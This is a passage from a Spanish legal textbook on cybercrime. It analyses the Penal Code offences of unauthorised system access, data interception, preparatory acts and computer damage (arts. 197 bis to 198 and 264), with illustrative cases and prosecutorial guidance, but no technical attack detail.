A. En primer lugar, tenemos la conducta de acceder al conjunto o una
parte de un sistema de información, vulnerando las medidas de seguridad es-
tablecidas para impedirlo, y sin estar debidamente autorizado. Acceder signi-
fica penetrar en el sistema o en una parte del mismo . Y los requisitos para que
el acceso sea típico son:
a) El acceso debe realizarse vulnerando las medidas de seguridad. Se-
gún la Circular de la Fiscalía tendrá la consideración de medida de
seguridad toda aquella que se haya establecido con la finalidad de
impedir el acceso al sistema, con independencia de que la misma
sea más o menos sólida, compleja o robusta y también de que haya
sido establecida por el administrador, el usuario, o por el instalador
del sistema, siempre que se mantenga operativa como tal medida de
seguridad por quien está legitimado para evitar el acceso.

- 203 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

Ej. 5.5: Son vulneracíones de las medidas de seguridad, por ejem-


plo, romper las claves de acceso a un sistema, romper el cífrado que se
ha establecido para asegurar la confidencialidad, introducir una puerta
trasera para evitar las medidas de protección del firewall o los mecanis-
mos de acceso establecidos (tarjeta, usuario más password, certificados,
etc.) . Pero también, por ejemplo, acceder con las claves de otra persona,
aunque no se hayan conseguido las mismas por medios subrepticios o ilí-
citos, bastando con que no se esté autorizado a usar esas claves, por ser
personales (Sentencia de la Audíencia Províncial de Madrid, Sección 7, de
27.11.2017).

b) El acceso debe realizarse sin estar debidamente autorizado. El art.


2d) de la Directiva 2013/40/UE entiende como tal el que no haya
sido autorizado por el propietario u otro titular del derecho sobre el
sistema o parte del mismo o no permitido por el Derecho nacional.
c) La conducta debe cometerse intencionadamente, es decir, es
siempre dolosa, lo que significa que no se castigan penalmente
los supuestos en que el sujeto desconoce que el acceso no estaba
autorizado, aunque, a su vez, una conducta realizada con tal desco-
nocimiento difícilmente se habrá perpetrado vulnerando medidas
de seguridad. O dicho de otra manera, quien vulnera medidas de se-
guridad por lo general sabe que no está autorizado.
Según la Circular 3/2017 de la Fiscalía, la combinación de los tres requi-
sitos anteriores deja al margen de una posible responsabilidad penal aquellos
supuestos menos graves en que, en el marco de una relación laboral o con-
tractual, la conducta realizada únicamente supone la infracción de políticas
de usuario o el incumplimiento de las normas organizativas sobre utilización
de los sistemas de información de la empresa, pero no implica, simultánea-
mente, una vulneración de medidas de seguridad y la actuación a sabiendas
de no estar autorizado a acceder a esa parte del sistema.
En este ámbito resulta pertinente recordar la distinción entre el error
sobre un elemento del tipo, que excluye el dolo, del error de prohibición (so-
bre la ilicitud de la conducta), que, de ser invencible da lugar a una exclusión
de la responsabilidad penal, mientras que si es vencible dará lugar a una ate-
nuación de la pena.
Así, la cualidad del acceso de "no estar debidamente autorizado" es un
elemento que define la conducta delictiva, un elemento del tipo. El error so-
bre el mismo, es decir, el actuar creyendo que se está autorizado para acceder,
excluirá el dolo del autor y dará lugar a la atipicidad de la conducta.

- 204 -
Capítulo 5. CIBERDELITOS BN SENTID ESTRICTO

Ej. 5.6: Pedro llega a su puesto de trabajo por la mañana e intenta acceder
al sistema de información de la empresa. Pero obtiene un mensaje que le dice
"usuario o clave incorrectos". Pensando que su mala memoria le ha hecho olvi-
dar una vez más la clave tras la última modificación de la misma siguiendo los
protocolos de seguridad, utiliza la de la su subordinado Antonio, que se la dice
sin sospechar nada, y mientras llama al servicio de apoyo informático para que
le restablezcan la suya. En realidad, lo que ha sucedido es que una hora antes
Pedro ha sido despedido de la empresa por un email, que todavía no ha abierto,
dado que para leerlo tenía que entrar en su ordenador, y en consecuencia se
le han retirado todos los privilegios de acceso. Cuando Pedro accede al siste-
ma con las claves de Antonio, ninguno de los dos conoce que el acceso no está
autorizado. Por tanto, actúan sin dolo, no perpetran un acceso no autorizado
intencionadamente. Su conducta, en consecuencia, no realizará el tipo penal del
art. 197 bis.

En cambio, si alguien accede a un sistema informático vulnerando medi-


das de seguridad y sabiendo que no está autorizado, pero cree erróneamente
que ello no es ilícito, por ejemplo porque cree erróneamente que el acceso no
autorizado solo está prohibido si se hace con fines maliciosos, o por ejemplo
porque cree erróneamente que tienen derecho a entrar en el sistema aun sin
autorización para determinados fines, nos encontramos con un error de pro-
hibición, un error sobre la ilicitud de la conducta.
Ej. 5.7: Ricardo entra en el sistema informático de la empresa tecnológica
Snoople, vulnerando sus medidas de seguridad , con la intención de demostrar
a sus directores lo buen informático que es y así lograr ser contratado, en Ja
creencia errónea de que si esta conducta se realiza solo en beneficio de la em-
presa (a la que pretende contar cuáles son sus vulnerabilidades y cómo solven-
tarlas) , la misma no es ilícita. Ricardo ha realizado el delito tipificado en el art.
197 bis, pero actúa en un error ele prohibición vencible que atenuará su pena .

Ej. 5.8. Augusto y Valeriana, que han siclo despedidos de la empresa en la


que trabajaban, acuden a una notaría para que el notario de fe de lo que van a rea -
lizar: a través de los portátiles que llevan, acceden. utilizando el nombre de usua-
rio y la contraseña personales de Genoveva, directora financiera ele la compañía
y antigua subordinada de Augusto, a la aplicación SIPAC. Una vez dentro acceden
en exclusiva a sus propios datos personales, relativos a la imputación ele horas de
trabajo al mes durante el año anterior. Su intención final era aportar dicha infor-
mación a la jurisdicción social en el litigio que mantenían contra la empresa por
su despido. Según la sentencia que condenó a Augusto y Valerio, ambos conocían
que estaban accediendo sin autorización y vulnerando medidas de seguridad al
sistema informático de la empresa. No actuaban, por tanto, en un error de tipo
que hubiera determinado la atipicidad y consiguiente impunidad de la conducta.

- 205 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

Sin embargo, ambos creían erró neamente que el hecho no era ilícito si lo hacían
solo para apoderarse de sus propios datos personales. Es decir, actuaron en un
error de prohibición vencible, lo que motivó una atenuación de la pena (Sentencia
de la Audiencia Provincial de Madrid, Sección 7, de 27.11.2017).

B. La segunda conducta comprendida en el art. 197 bis es la de facilitar


a otra persona el acceso no autorizado y vulnerando las medidas de seguri-
dad. La previsión es problemática, primero porque es una particularidad de
nuestro sistema, que no viene recogida como tal en la definición del intrusis-
mo informático de los textos internacionales. Estos se refieren solo a la nece-
sidad de castigar la intervención delictiva en la conducta anterior, cosa que,
por otro lado, el Código penal ya hace con carácter general en los artículos
2 7 y siguientes. Por ello surgen dudas en la interpretación del alcance de esta
modalidad. Una parte de la doctrina ha querido ver en este precepto el mero
castigo de conductas de participación en el acceso ilícito de otro. En tal caso
la previsión sería superflua, salvo porque establece la misma pena, la que co-
rresponde al autor, para cualquier tipo de participación (GoNzArnz ConANrEs,
2015, COLAS TUREGANO, 2016).
Este aspecto ha sido precisamente criticado, ya que quizás solo aquellas con-
ductas que alcanzaran el grado de cooperación necesaria (sin esa contribución el
acceso ilícito no se hubiera podido cometer) merecerían el mismo castigo que quien
comete el acceso.

La opinión de la Fiscalía parece inclinarse por entender que el precepto


abarca más conductas que las calificables de participación en el acceso ilícito
de otro, aunque no especifica cuáles.
Así la Circular 3/2017 afirma: a) Se contempla corno conducta típica, además
del propio acceso a un sistema informático ajeno -en las condiciones mencionadas- ,
la conducta de facilitar a otra persona ese mismo acceso, en idénticas condiciones, lo
que permite incluir en el tipo supuestos no previstos hasta ahora, aunque, al menos en
algunos casos, podrían haber sido abarcados corno formas de participación criminal.

Habrá que esperar a los pronunciamientos jurisprudenciales para con-


firmar la interpretación que se da a este precepto.
C. La tercera modalidad consiste en mantenerse en el sistema en con-
tra de la voluntad de quien tenga el legítimo derecho a excluirlo. Esta previ-
sión resulta necesaria para castigar aquellos supuestos en que el sujeto ha
accedido al sistema con la autorización de su titular, por ejemplo para reali-
zar precisamente tareas de eliminación de malware, y finalizada la tarea en-
cargada permanece en el sistema sin el conocimiento ni consentimiento de su
titular.

- 206 -
Capítulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

Ej. 5.9: Un experto en ciberseguridad está realizando por encargo de una


empresa unas labores de pentestin9 (auditoría de penetración en el sistema )
en su sistema informático. Para poder realizar estas labores se le permite un
acceso restringido al sistema y se le da la autorización para poder escalar privi-
legios utilizando exploits, malware u otras herramientas. El experto logra tomar
el control como administrador, y aprovecha la situación para, una vez finalizada
su auditoría, en lugar de abandonar por completo el sistema, dejar instalado en
él un malware que establece un RAT (Remate Administration Too/) con el objeto
de controlar el sistema remotamente.

1.2. La interceptación de transmisiones no públicas de datos informáticos


El párrafo 2º del artículo 197 bis castiga la interceptación, mediante la
utilización de artificios o instrumentos técnicos, y sin estar debidamente au-
torizado, de transmisiones no públicas de datos informáticos que se produz-
can desde, hacia o dentro de un sistema de información, incluidas las emisio-
nes electromagnéticas de los mismos.
En este precepto se castiga, siguiendo lo establecido en el art. 3 del Con-
venio de Budapest y en el art. 6 de la Directiva 2013/40/UE de 12 de agosto,
la interceptación de la trasmisión de datos informáticos. La interceptación
abarca, según el considerando 9º de la Directiva, sin limitarse necesariamen-
te a ello, la escucha, el seguimiento y el análisis del contenido de comunica-
ciones, así como la obtención del contenido de los datos bien directamente,
mediante el acceso y recurso a ese sistema de información, o indirectamente,
mediante el recurso a sistemas de escucha y grabación electrónicos por me-
dios técnicos.
Se entiende que se refiere el precepto a la interceptación de transmisio-
nes automáticas -no personales- entre equipos, por lo que incluye las trans-
misiones de datos informáticos que se producen entre sistemas o dispositi-
vos electrónicos al margen de la intervención humana, por tener su origen en
la previa programación o el propio funcionamiento interno del sistema. En
relación con los datos trasmitidos, la Directiva 2013/40/UE nos da de nuevo
una definición: toda representación de hechos, informaciones o conceptos de
una forma que permite su tratamiento por un sistema de información, inclui-
dos los programas que sirven para hacer que dicho sistema de información
realice una función.
Es preciso distinguir esta conducta de la interceptación de comunicacio-
nes personales, que se castiga en el art. 197.1 CP. En el 197 bis, por el contra-
rio, se sanciona la interceptación no autorizada de cualquier otra transmisión

- 207 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

de datos informáticos que no tenga el carácter de comunicación interperso-


nal y que no tenga el carácter de pública.
Son objeto de protección, por tanto, según la Circular 3/2017 de la Fisca-
lía, las comunicaciones entre dos o más sistemas informáticos, las que tienen
lugar entre distintos ordenadores dentro de un mismo sistema o incluso las
que median entre una persona y un ordenador, como por ejemplo, siguiendo
el informe preparatorio de la Convención de Budapest, las que se establecen
a través del teclado.
La trasmisión interceptada ha de realizarse de manera no pública, es de-
cir, el carácter no público se refiere a la naturaleza del proceso de transmi-
sión (comunicación) y no a la naturaleza de los datos transmitidos. Los datos
comunicados pueden ser información que esté accesible al público, pero la
comunicación o trasmisión de los mismos se realiza de forma confidencial.
En consecuencia, según la Fiscalía, hay que considerar protegidas por este
precepto todas las transmisiones efectuadas por redes privadas, pero tam-
bién aquellas que, aun efectuadas a través de redes púbicas, tengan carácter
reservado o en relación con las cuales se hayan establecido, de una u otra for-
ma, mecanismos para garantizar la privacidad y excluir a terceros del conoci-
miento de dicha información.
El precepto se refiere además a las emisiones electromagnéticas, men-
ción expresa necesaria ya que no pueden ser consideradas en sí mismas datos
informáticos, pero es posible que los datos puedan ser reconstruidos a partir
de dichas emisiones. Este novedoso método permite robar información aun-
que el ordenador no esté conectado a Internet.
Ej. 5.10: AírHopper es un malware tipo de Keylogger que "graba" las teclas
pulsadas y las recoge en un archivo. Es capaz de recibir ciertas señales de radio
que emiten ciertos modelos de monitor o pantalla. Para ello emplea ondas de
radío FM con las que se puede transmitir una señal que será recogida y alma-
cenada por un receptor: Así permite robar claves o mensajes privados. La señal
se traduce y almacena pudiendo ver en tiempo real lo que el usuario está escri-
bíendo en el otro dispositivo.

La expresión «sin autorización» debe entenderse de la manera ya vis-


ta: que no haya sido autorizado por el propietario u otro titular del de-
recho sobre el sistema o parte del mismo o no permitido por el Derecho
nacional.
En relación con la expresión "mediante la utilización de artificios o ins-
trumentos técnicos" el Informe previo a la Convención de Budapest pone los

- 208 -
Capítulo S. CIBERDELITOS BN S NTIDO ESTRICTO

siguientes ejemplos: los dispositivos que se conectan a las líneas de transmi-


sión, los dispositivos que pueden utilizarse para obtener y grabar las comuni-
caciones inalámbricas, el uso de software, contraseñas y códigos.

2. Actos preparatorios del artículo 197 ter Cp

El Artículo 197 ter del Código penal español dispone:


Será castigado con una pena de prisión de seis meses a dos años o multa de
tres a dieciocho meses el que, sin estar debidamente autorizado, produzca, adquie-
ra para su uso, importe o, de cualquier modo, facilite a terceros, con la intención de
facilitar la comisión de alguno de los delitos a que se refieren los apartados 1 y 2 del
artículo 197 o el artículo 197 bis:
a) un programa informático, concebido o adaptado principalmente para co-
meter dichos delitos ; o
b) una contraseña de ordenador, un código de acceso o datos similares que
permitan acceder a la totalidad o a una parte de un sistema de informa-
ción.

Este precepto castiga, siguiendo lo previsto en el Convenio de Budapest


y en la Directiva 2013/40/UE de 12 de agosto, determinados actos prepara-
torios. La exposición de motivos de la Ley Orgánica 1/2015, de 30 de marzo,
por la que se modifica la Ley Orgánica 10/1995, de 23 de noviembre, del Có-
digo Penal, explica que con él se tipifica la facilitación o la producción de pro-
gramas informáticos o equipos específicamente diseñados o adaptados para
la comisión de estos delitos. La Fiscalía justifica esta anticipación de la inter-
vención penal en la preocupación por la tendencia creciente a la planificación
y ejecución de ataques a gran escala contra sistemas informáticos.
Así, se castiga la producción, adquisición, importación, facilitación a terce-
ros, de determinados instrumentos, sin estar autorizado y con la intención de fa-
cilitar con ello la comisión de un delito de los previstos en los números anteriores.
La conjunción de ambos requisitos: sin estar autorizado, más el elementos
subjetivo: intención de facilitar la comisión de un delito, hace que no se casti-
guen, por ejemplo, la producción o adquisición de herramientas o instrumen-
tos que si bien son aptas para cometer estos hechos ilícitos han sido creadas y
comercializadas para su uso legítimo, con la autorización del titular del siste-
ma, con el objetivo de auditar su seguridad, detectar vulnerabilidades, etc.
Los instrumentos y herramientas objeto de la conducta son:
1) Programas informáticos concebidos o adaptados principalmente
para cometer estos delitos.

- 209 -
Ci bercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

2) Contraseñas de ordenador, códigos de acceso o datos similares que


permitan acceder a la totalidad o a una parte del sistema.
Ej. 5. 11 : Incluiríamos en esta modalidad, por ejemplo, la conducta
de quien proporciona al hacke r las claves a las que no tiene derecho para
que así consiga el acceso, o el exploit para que lo utilice para penetrar en el
sistema. Como vimos en el Capítulo 1, con frecuencia los lwckers no pro -
graman sus propios exploits sino que utilizan herramientas creadas por
otros hackers más experimentados.

Para castigar por este delito no es necesario que un tercero haya llegado
a emplear esos medios o instrumentos en un intento de acceso ilícito. Si hu-
biera sucedido así ya no estaríamos ante un mero acto preparatorio castigado
en este artículo, sino en la modalidad de facilitación de acceso ilícito a casti-
gar por el art. 197 bis (GoNZALEZ CoLLANTES, 2015).

3. Agravaciones específicas

El Código penal establece en su artículo 197 quáter una agravación para


los delitos anteriores en el caso de que se cometan en el seno de una organi-
zación o grupo criminal, lo que por otro lado es frecuente.
La definición de organización y grupo criminal se contiene en los artícu-
los 5 70 bis y 5 70 ter Cp respectivamente:
Art. 570 bis: " ...A los efectos de este Código se entiende por organización cri-
minal la agrupación formada por más de dos personas con carácter estable o por
tiempo indefinido, que de manera concertada y coordinada se repartan diversas ta-
reas o funciones con el fin de cometer delitos".
Art. 5 70 ter: " ... A los efectos de este Código se entiende por grupo criminal la
unión de más de dos personas que, sin reunir alguna o algunas de las características
de la organización criminal definida en el artículo anterior, tenga por finalidad o por
objeto la perpetración concertada de delitos".

4. Disposiciones comunes

4.1. Responsabilidad de las personas jurídicas


Además el artículo 197 quinquies establece la responsabilidad de las
personas jurídicas (por ejemplo una empresa) por la comisión de estos deli-
tos, que les puede acarrear penas de multa, disolución de la persona jurídica,
suspensión o prohibición de actividades, clausura de sus locales y estableci-
mientos, intervención judicial, etc.

- 210 -
Capítulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

Recordemos que la responsabilidad de las personas jurídicas se establece


para los delitos en que está expresamente prevista y cuando concurre alguna de
estas circunstancias:
• El delito se ha cometido en nombre o por cuenta de la persona jurídica, y
en su beneficio directo o indirecto, por sus representantes legales o por
aquellos que actuando individualmente o como integrantes de un órgano
de la persona jurídica, están autorizados para tomar decisiones en nombre
de la persona jurídica u ostentan facultades de organización y control den-
tro de la misma.
• El delito se ha cometido en el ejercicio de actividades sociales y por cuenta
y en beneficio directo o indirecto de la persona jurídica, por quienes, es-
tando sometidos a la autoridad de las personas físicas mencionadas en el
párrafo anterior, han podido realizar los hechos por haberse incumplido
gravemente por aquéllos los deberes de supervisión, vigilancia y control
de su actividad atendidas las concretas circunstancias del caso.

4.2. Requisitos de procedibílidad


Por último, la persecución de estos delitos exige la denuncia de la perso-
na agraviada o de su representante legal, salvo para proceder por los hechos
descritos en el artículo 198 o cuando la comisión del delito afecte a los intere-
ses generales o a una pluralidad de personas. Además, el perdón del ofendido
o de su representante legal, en su caso, extingue la acción penal.
Como señalamos en los capítulos anteriores, en estos delitos existe una
elevadísima cifra negra, pocos casos se denuncian y menos todavía llegan a jui-
cio. Ello no se debe a que en realidad los riesgos que presentan estas figuras
no fueran tan perentorios, como ha afirmado alguna autora (CoLAs TURÉGANO,
2016 ), sino probablemente a las múltiples dificultades que presenta tanto la in-
vestigación y descubrimiento como el enjuiciamiento de un delito de frecuen-
te ejecución trasfronteriza (ver Capítulo 4). Pero también, como se comentó, a
que en ocasiones las empresas atacadas prefieren minimizar el daño reputa-
cional optando por la no persecución penal del delito, o a que aceptan las prác-
ticas ilícitas de hackers de sombrero blanco o gris, de las que prefieren obtener
un beneficio. Estas posibilidades se le ofrecen al perjudicado al convertir estos
delitos en semiprivados (solo perseguibles por denuncia del ofendido).
La afectación a intereses generales o a una pluralidad de personas que
conlleva la innecesariedad de denuncia habrá de valorarse caso por caso, en
atención al número o características del sistema o sistemas informáticos ob-
jeto de acceso o interceptación ilegal, o, en relación con los actos preparato-
rios castigados en el art. 197 ter, en función del ataque a cuyo favorecimiento
estaban destinadas las herramientas o instrumentos.

- 211 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

Ej. 5.12. Según la Fiscalía no sería necesaria la denuncia previa cuando el


objeto de la acción ilícita fuera el espionaje informático de organismos e ins-
tituciones del Estado, o cuando lo que se pretenda sea la obtención masiva de
credenciales bancarias de una pluralidad de ciudadanos o acciones de similar
naturaleza planificadas para afectar a muchas personas.

5. Hacking cometido por autoridad o funcionario púbico: el artículo


198Cp

El artículo 198 dispone:


La autoridad o funcionario público que, fuera de los casos permitidos por la
Ley, sin mediar causa legal por delito, y prevaliéndose de su cargo, realizare cual-
quiera de las conductas descritas en el artículo anterior, será castigado con las pe-
nas respectivamente previstas en el mismo, en su mitad superior y, además, con la
de inhabilitación absoluta por tiempo de seis a doce años.

Este precepto, antes de la introducción de los artículos 197 bis a quin-


quies, aparecía a continuación del art. 197 CP, por lo que la mención que en él
se realiza a las conductas previstas en el artículo anterior remitía a la totali-
dad de las conductas sancionadas en aquél. Pero tras la reforma el legislador
ha olvidado adaptarlo y ahora el artículo al que literalmente se remite es el
197 quinquies, lo que lo deja carente de sentido. Por ello, y aunque la idea
puede suponer fricciones con el principio de legalidad, algunos autores y la
Fiscalía proponen una interpretación sistemática que conduzca a entender
que se refiere a todos los tipos penales de los que también pueden ser res-
ponsables las personas jurídicas, y que concretamente se mencionan en el
art. 197 quinquies, es decir los hechos ilícitos tipificados en los artículos 197,
197 bis y 197 ter CP.
Según esta interpretación, y en relación con los delitos que aquí nos ocu-
pan, este artículo contiene un tipo agravado para el caso en que las conductas
anteriores sean cometidas por un sujeto activo cualificado: una autoridad o
funcionario público. Se trata por tanto de un delito especial impropio.
La definición de lo que deba entenderse por autoridad o funcionario pú-
blico a efectos del Código penal nos la da su artículo 24:
l. A los efectos penales se reputará autoridad al que por sí solo o como
miembro de alguna corporación, tribunal u órgano colegiado tenga mando o ej erza
jurisdicción propia. En todo caso, tendrán la consideración de autoridad los miem-
bros del Congreso de los Diputados, del Senado, de las Asambleas Legislativas de las
Comunidades Autónomas y del Parlamento Europeo. Se reputará también autori-
dad a los funcionarios del Ministerio Fiscal.

- 212 -
Capitulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

2. Se considerará funcionario público todo el que por disposición inmediata


de la Ley o por elección o por nombramiento de autoridad competente participe en
el ejercicio de funciones públicas.

Es elemento esencial para la comisión de este delito que la autoridad o


funcionario realice la conducta abusando de su posición funcionarial. De lo
contrario se les aplicaría los tipos comunes de los artículos anteriores.
Además, el precepto exige que no medie causa por delito.
Ello se debe a que este precepto, como ya se ha explicado, se redactó pensando ini-
cialmente en la realización por los funcionarios de los delitos contemplados en el artícu-
lo 197, delitos contra la intimidad de las personas, respecto de los cuales, si la conducta
se llevara a cabo en el seno de una investigación de un delito, tendrían preferencia, de
resultar aplicables, los delitos previstos en los artículos 53 7 y ss. Pero entre esos delitos
(delitos cometidos por los funcionarios públicos contra la inviolabilidad domiciliaria y
demás garantías de la intimidad) no encontramos un tipo paralelo a las conductas de
hacking, con lo que la excepción no tiene demasiado sentido. En todo caso, conforme a la
literalidad del precepto, el mismo no es aplicable si media causa por delito.

En el caso de que medie causa por delito, es decir, si la conducta de hac-


king se comete en el marco de la investigación de un delito, el funcionario que
la realice sin estar debidamente autorizado, por ejemplo sin contar con una
orden judicial que autorice el acceso o la interceptación, deberá responder
por los tipos comunes de los artículos 19 7 y siguientes.
No se precisa denuncia para proceder por los hechos descritos en este
artículo.

II. MALWARE. DAÑOS INFORMÁTICOS

El legislador español introdujo en la Reforma del Código penal operada


por LO 5/ 2010 de 22 de junio, una serie de ciberdelitos autónomos (antes
eran una mera modalidad agravada de daños en cosa ajena) en el Capítulo
X, dedicado a los daños, dentro del Título XIII, que lleva por rúbrica "Deli-
tos contra el patrimonio y contra el orden socioeconómico". Estos preceptos
después fueron modificados en la reforma realizada por la LO 1/2015, para
adaptarlos a Directiva 2013/40/UE de 12 de agosto, que a su vez sigue los
postulados del Convenio de Budapest sobre la Ciberdelincuencia de 200 l.
Según el informe previo al Convenio de Budapest, lo que se pretende con
la tipificación de estas conductas es otorgar a los datos y programas infor-
máticos una protección similar a la que tienen los objetos corpóreos frente a
daños causados de forma deliberada.

- 213 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

La regulación expresa se hacía necesaria según algunos, conveniente según


otros, ante la discusión que se había generado en algunos países sobre si estas con-
ductas eran o no subsumibles sin más en los delitos de daños tradicionales, al reali-
zarse sobre un objeto incorporal o inmaterial (GoNzALEZ Rus, 2002, DE LA MATA BARRAN-
ca /HERNANDEZ DiAZ, 2009).

Sin embargo, el resultado de este tipo de conductas va más allá de un


daño patrimonial, pues afecta a la integridad y la disponibilidad de los siste-
mas informáticos, por lo que la doctrina ha criticado también la ubicación sis-
temática de estos delitos, que impondrá determinadas interpretaciones, no
del todo convenientes para la protección de este particular bien jurídico (DE
LA MATA BARRANCO/ HERNÁNDEZ DíAZ, 2009, ANDRÉS DoMINGUEZ, 2015).

l. Daños informáticos. Artículo 264 Cp

El artículo 264 Cp establece:


l. El que por cualquier medio, sin autorización y de manera grave borrase, da-
ñ.ase, deteriorase, alterase, suprimiese o hiciese inaccesibles datos informáticos, pro-
gramas informáticos o documentos electrónicos ajenos, cuando el resultado produci-
do fuera grave, será castigado con la pena de prisión de seis meses a tres años.
2. Se impondrá una pena de prisión de dos a cinco años y multa del tanto al
décuplo del perjuicio ocasionado, cuando en las conductas descritas concurra algu-
na de las siguientes circunstancias:
l. ª Se hubiese cometido en el marco de una organización criminal.
2.ª Haya ocasionado daños de especial gravedad o afectado a un número ele-
vado de sistemas informáticos.
3.ª El hecho hubiera perjudicado gravemente el funcionamiento de servicios
públicos esenciales o la provisión de bienes de primera necesidad.
4.ª Los hechos hayan afectado al sistema informático de una infraestructu-
ra crítica o se hubiera creado una situación de peligro grave para la se-
guridad del Estado, de la Unión Europea o de un Estado Miembro de la
Unión Europea. A estos efectos se considerará infraestructura crítica un
elemento, sistema o parte de este que sea esencial para el mantenimien-
to de funciones vitales de la sociedad, la salud, la seguridad, la protec-
ción y el bienestar económico y social de la población cuya perturbación
o destrucción tendría un impacto significativo al no poder mantener sus
funciones.
5.ª El delito se haya cometido utilizando alguno de los medios a que se refie-
re el artículo 264 ter.
Si los hechos hubieran resultado de extrema gravedad, podrá imponerse la
pena superior en grado.
3. Las penas previstas en los apartados anteriores se impondrán, en sus res-
pectivos casos, en su mitad superior, cuando los hechos se hubieran cometido me-

- 214 -
Capítulo S. CIBERDELITOS EN SENTIDO ESTRICTO

<liante la utilización ilícita de datos personales de otra persona para facilitarse el


acceso al sistema informático o para ganarse la confianza de un tercero.

1.1. El tipo básico


En realidad, un delito de daños contra un sistema informático podría
realizare de dos maneras: la primera, mediante la destrucción física del conti-
nente o soporte material, del hardware, por ejemplo destruyendo a martilla-
zos el disco duro de un ordenador. Este tipo de daños, que se castiga a través
del artículo 263 (ANDRÉS DoMINGUEZ, 2015), no nos interesa aquí, pues no son
un ciberdelito, tal y como se explicó en el Capítulo 4. La segunda posibilidad
de dañar un sistema de información es atacando los elementos lógicos del
mismo, es decir, atacando el software del sistema (datos, programas y docu-
mentos electrónicos).
El artículo 264 castiga las conductas consistentes en borrar, dañar, de-
teriorar, alterar, suprimir o hacer inaccesibles, por cualquier medio, sin au-
torización y de manera grave, datos informáticos, programas informáticos o
documentos electrónicos ajenos, cuando el resultado producido fuera grave.
El objeto de la conducta se limita, por tanto, al software.
El software se puede destruir o deteriorar, a su vez, bien destruyendo
físicamente el soporte que lo contiene, lo que de nuevo no constituirá un ci-
berdelito, o en cambio, mediante el uso de procedimientos informáticos,
principalmente, pero no solo, mediante el uso de malware, conductas que sí
entrarían en esta categoría y que son, por tanto, de las únicas que nos vamos
a ocupar en esta obra.
No hay acuerdo en la doctrina sobre como castigar una conducta sobre el so-
porte físico que causa al mismo tiempo la destrucción del elemento lógico. Algunos
autores entienden que sería subsumible sin más en el art. 264 (GoNZÁLEZ Rus, 2002,
DE LA MATA BARRANCO/ HERNANDEZ DtAz, 2009), mientras que otros opinan que debería
castigarse tanto por el 263 como por el 264, en concurso ideal de delitos (ANDRÉS Do-
MINGUEZ, 2015). En todo caso, aquí no nos ocuparemos de la destrucción de software
cometida únicamente a través de la destrucción física del hardware.

Los verbos utilizados por el legislador intentan cubrir todas las posibles
conductas que impliquen la destrucción, total o parcial, la modificación o la inac-
cesibilidad de los datos, programas o documentos informáticos. Esta última mo-
dalidad implica que no se afecta a la existencia o esencia de los datos, programas
o documentos, pero se produce la imposibilidad de acceder a ellos, ya sea para
conocer su contenido, operar con ellos o, utilizarlos en cualquier modo.
Como vimos en el capítulo 2, algunos tipos de malware que introducidos
en el sistema producen cualquiera de los citados efectos son los virus con carga

- 215 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

útil (payload) maliciosa que destruye datos o programas, bombas lógicas o time
bombs -inserción de un código intencionalmente en un programa informático
que permanece oculto hasta cumplirse una o más condiciones preprograma-
das, momento en el que se ejecuta una acción maliciosa, ramsomware, etc.
Ej. 5.13: Recuérdese el ejemplo 2.28. Back Orífice es un programa ideado
para la administración remota de sistemas, que permite a un atacante modificar
ficheros o borrar parte del contenido del disco duro.

Ej. 5.14: El malware tipo ransomwm·e o criptovirus o secuestrador cifra


todos o parte de los archivos del sistema, dejándolos inaccesibles al legítimo
usuario, por lo general hasta que este paga un rescate. Recuérdense los ejem-
plos 2.35 (Wannacry) y 2.36: (Cryptolocker), que se explicaron en el capítulo 2.

Pero las conductas citadas deben cumplir dos requisitos para resultar
delictivas:
a) haberse realizado sin autorización, lo que significa que no haya sido
autorizado por el propietario u otro titular del derecho sobre el sis-
tema o parte del mismo o no permitido por el Derecho nacional;
b) ser graves: concepto indeterminado que debe evaluarse conforme
a la potencialidad lesiva que la conducta presenta, lo que a su vez
depende tanto de su probabilidad de éxito como del valor y la uti-
lidad de los datos, programas o documentos y la disminución de la
funcionalidad y utilidad del sistema que pueda provocar.
Además, para que se consume el delito es preciso no solo que la conduc-
ta presente ex ante esta peligrosidad grave (lo que bastaría para condenar
por tentativa), sino además haber causado efectivamente un resultado grave.
La gravedad del resultado se medirá de la misma manera, atendiendo conjun-
tamente al valor y la utilidad de los elementos borrados, dañados, etc., y a las
consecuencias que la conducta ha producido para la propia funcionalidad del
sistema y su utilidad para su titular.
La Circular 3/2017 de la Fiscalía establece, en este sentido, que "los criterios
que pueden ser apreciados, con el fin de cuantificar ese daño funcional, van desde el
valor de la destrucción definitiva de los datos informáticos - con la dificultad que en-
traña esta valoración- al valor económico cuantificable del coste de restablecimien-
to de la operatividad de los datos, programas o, en su caso, del sistema afectado.
Derivado de este último criterio está el del perjuicio económico que haya supuesto
para la víctima o el afectado el periodo de tiempo en que los sistemas han perma-
necido inutilizados y /o el necesario para restaurar su funcionamiento, factores que
estarán íntimamente ligados a la pérdida de capacidad de actuación o al lucro ce-
sante sufrido por la imposibilidad de uso de los datos o sistemas durante ese lapso

- 216 -
Capítulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

temporal, daños que serán más evidentes y graves para las entidades que tienen por
objeto una actividad económica. No han de olvidarse tampoco, como criterio para la
valoración del resultado de la acción típica, las consecuencias que podrían derivar-
se, a efectos de la reputación de una determinada empresa, entidad o persona física,
del hecho de haber sido objeto de un ataque informático pues ello puede conllevar
un perjuicio intangible por el daño causado a la imagen pública de aquéllas. Ha de
recordarse al respecto que en ocasiones el atacante no tiene como objetivo ocasio-
nar un daño patrimonial, sino producir un daño a la imagen de una determinado
organismo o entidad provocando una pérdida de credibilidad o una desconfianza
social hacia el mismo.
Finalmente habrán de tenerse en cuenta los perjuicios ocasionados no sola-
mente para el directamente ofendido sino también para el interés general, los bie-
nes jurídicos afectados por la acción ilícita, o el riesgo que se genera para intereses
públicos o privados por causa de la perdida de los datos, programas o documentos
etc. En definitiva, todas estas consecuencias deberán analizarse caso a caso y en
